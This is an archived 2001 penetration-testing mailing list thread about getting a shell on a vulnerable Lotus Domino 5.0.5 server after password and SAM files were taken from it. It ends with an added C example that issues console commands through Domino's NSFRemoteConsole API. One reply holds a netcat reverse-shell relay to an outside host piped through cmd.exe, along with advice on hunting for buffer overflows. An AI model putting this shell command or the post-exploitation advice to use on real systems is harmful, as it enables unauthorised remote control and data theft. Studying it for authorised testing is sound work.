Re: Hacking Lotus Domino 5.0.5

From: jjore@imation.com
Date: 10/16/01


Message-ID: <OFCDE30BFB.5DD9D42C-ON86256AE7.0057ECBF@imation.com>
Date: Tue, 16 Oct 2001 11:07:48 -0500

You could also hack up a quick binary using the published API. For
simplicity's sake, just use the NSFRemoteConsole function. You'll be able
to demonstrate how an attacker that controls the OS also has complete
control (and without needing to resort to dirty tricks either) over the
Domino server.

Josh

Function : Server

NSFRemoteConsole - Issues a console command to a server.
----------------------------------------------------------------------------------------------------------

#include <nsfdb.h>

STATUS LNPUBLIC NSFRemoteConsole(
        char far *ServerName,
        char far *ConsoleCommand,
        HANDLE far *hResponseText);

Description :

This function is used to issue a console command to a server from an API
program or from an API server add-in program.

If you do not have remote access to the server an error will be returned.
To have remote access to a server, you must be listed in the Server
Document Administrator Access field or in the ADMIN_ACCESS variable in the
server's notes.ini.

NOTE: If you use this function to shut down a server (by entering the
"exit" or "quit" commands), you may receive an error code of "Server not
responding" or "Remote system no longer responding". Assuming that the
server was active when you issued the command, these errors usually mean
that your command was successful (the server shuts down before it can
return a meaningful response).

NOTE: This function will return NOERROR if the server's disk is full, but
the returned response buffer will be 0-length.

"'ken'@FTU" <franklin_tech_bulletins
10/15/01 06:33 PM

 
        To: renato.ettisberger@ch.pwcglobal.com
        cc: PEN-TEST@securityfocus.com
        Subject: Re: Hacking Lotus Domino 5.0.5

I suspect from your email that your Domino server is on an NT box as
opposed to an AS/400.

If it's a 400 you're somewhat out of luck because few, if any, tools exist
for 400 hacking.

If it's NT here's an idea:
  If you can place a file on the machine put netcat on the machine. You
can then get a shell back with the command: nc foo.com [your inbound
port] | cmd.exe | nc foo.com [your outbound port]
You can now send commands to your inbound port and watch the result on
your outbound port.

You can always search for buffer overflows. If one is found you could
possibly execute commands, or do other stuff, within the server's
permission level.

Hope this helps.

'ken'

renato.ettisberger@ch.pwcglobal.com wrote:

> Hi
>
> I'm doing a pen test for a client. They have many systems in the dmz,
> including some nt/win2k boxes running IIS. Unfortunately, all IIS are
> patched :-(. But I found a vulnerable Domino 5.0.5 Server. I was able to
> download some nice files like names.nsf, the sam-file in winnt/repair and an
> admin.nsf with all user names and passwords. I think, that's a finding :-),
> but I want more.
> Is there a way to get a shell? I'm able to create files on the server or at
> least I can fill out a question form. Can I use this to create a file or
> execute a command (I don't think so, but maybe...)? Or does anybody know
> some other stuff, that I can do?
>
> As you can see, I'm not a pro in Lotus Domino.
>
> Thanks for your help
>
> regards
> Renato
> ----------------------------------------------------------------
> The information transmitted is intended only for the person or entity to
> which it is addressed and may contain confidential and/or privileged
> material. Any review, retransmission, dissemination or other use of, or
> taking of any action in reliance upon, this information by persons or
> entities other than the intended recipient is prohibited. If you received
> this in error, please contact the sender and delete the material from any
> computer.
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please see:
> https://alerts.securityfocus.com/
>

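The approach Josh suggests above, written out as an added example that is not part of the original thread and not Lotus code: a small C program that initialises the Notes C API, issues one console command with NSFRemoteConsole and interprets the result according to the two NOTEs in the API description (an error such as "Server not responding" or "Remote system no longer responding" after "exit" or "quit" usually means the shutdown worked; NOERROR with a 0-length response means the server's disk is full). The SDK-dependent part is compiled only with -DHAVE_NOTES_SDK, an assumed build switch of mine, so the result-handling helpers can be compiled and checked on a box without the Notes headers and library; the assumption that the response text is NUL-terminated, the buffer sizes and the usage line are mine as well. As the description says, the ID the program runs under must have remote console access (the Administrator field of the Server document or ADMIN_ACCESS in notes.ini), which is what an attacker who controls the OS can grant himself.

```c
/* console_cmd.c - issue a Domino console command via NSFRemoteConsole.
 * Added example, not from the original post.  Build with the Notes C API:
 *   cc -DHAVE_NOTES_SDK -I<sdk>/include console_cmd.c -l<notes library>
 * Without -DHAVE_NOTES_SDK only the SDK-independent result handling compiles.
 * Usage: console_cmd <server> <console command...>   e.g.  "show users" */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#ifdef HAVE_NOTES_SDK
#include <global.h>     /* STATUS, HANDLE, NOERROR, NULLHANDLE, ERR(), NotesInit* */
#include <nsfdb.h>      /* NSFRemoteConsole */
#include <osmem.h>      /* OSLockObject, OSUnlockObject, OSMemFree */
#include <osmisc.h>     /* OSLoadString */
#endif

enum outcome {
    OUT_OK,              /* NOERROR and a non-empty response                  */
    OUT_EMPTY_RESPONSE,  /* NOERROR but 0-length buffer: server disk is full  */
    OUT_SHUTDOWN_LIKELY, /* exit/quit answered by "not responding": it's down */
    OUT_FAILED           /* any other error, e.g. no remote console access    */
};

/* Case-insensitive check: is the first word of the command "exit" or "quit"? */
int is_shutdown_command(const char *cmd)
{
    char word[8];
    size_t n = 0;
    while (*cmd == ' ' || *cmd == '\t') cmd++;
    while (*cmd && !isspace((unsigned char)*cmd) && n < sizeof(word) - 1)
        word[n++] = (char)tolower((unsigned char)*cmd++);
    word[n] = '\0';
    return strcmp(word, "exit") == 0 || strcmp(word, "quit") == 0;
}

/* failed/errtext come from the STATUS and OSLoadString; response_len is the
 * length of the returned text when the call itself succeeded. */
enum outcome classify_result(int failed, const char *errtext,
                             const char *command, size_t response_len)
{
    if (!failed)
        return response_len == 0 ? OUT_EMPTY_RESPONSE : OUT_OK;
    if (is_shutdown_command(command) && errtext != NULL &&
        (strstr(errtext, "Server not responding") != NULL ||
         strstr(errtext, "Remote system no longer responding") != NULL))
        return OUT_SHUTDOWN_LIKELY;
    return OUT_FAILED;
}

const char *outcome_text(enum outcome o)
{
    switch (o) {
    case OUT_OK:              return "command accepted";
    case OUT_EMPTY_RESPONSE:  return "no error, but empty response (server disk full?)";
    case OUT_SHUTDOWN_LIKELY: return "no reply, server most likely shut down";
    default:                  return "command failed";
    }
}

#ifdef HAVE_NOTES_SDK
/* Run one console command; copies the response text (possibly empty) to out. */
enum outcome remote_console(char *server, char *command, char *out, size_t outlen)
{
    HANDLE hResponse = NULLHANDLE;
    char errtext[256] = "";
    size_t len = 0;
    STATUS err;

    out[0] = '\0';
    err = NSFRemoteConsole(server, command, &hResponse);
    if (err != NOERROR) {
        OSLoadString(NULLHANDLE, ERR(err), errtext, sizeof(errtext) - 1);
    } else if (hResponse != NULLHANDLE) {
        /* Assumption: the response buffer holds NUL-terminated text. */
        const char *text = (const char *)OSLockObject(hResponse);
        len = strlen(text);
        strncpy(out, text, outlen - 1);
        out[outlen - 1] = '\0';
        OSUnlockObject(hResponse);
        OSMemFree(hResponse);
    }
    return classify_result(err != NOERROR, errtext, command, len);
}

int main(int argc, char *argv[])
{
    char command[256] = "", response[4096];
    enum outcome o;
    int i;

    if (argc < 3) {
        fprintf(stderr, "usage: %s <server> <console command...>\n", argv[0]);
        return 1;
    }
    for (i = 2; i < argc; i++) {          /* join argv[2..] into one command line */
        if (i > 2) strncat(command, " ", sizeof(command) - strlen(command) - 1);
        strncat(command, argv[i], sizeof(command) - strlen(command) - 1);
    }
    if (NotesInitExtended(argc, argv) != NOERROR) {
        fprintf(stderr, "NotesInitExtended failed\n");
        return 1;
    }
    o = remote_console(argv[1], command, response, sizeof(response));
    printf("%s: %s\n%s", command, outcome_text(o), response);
    NotesTerm();
    return o == OUT_FAILED ? 1 : 0;
}
#endif
```

The classification deliberately treats a "not responding" error as success only when the command was exit or quit; the same error after "show users" is reported as a failure, since there the server really did not answer.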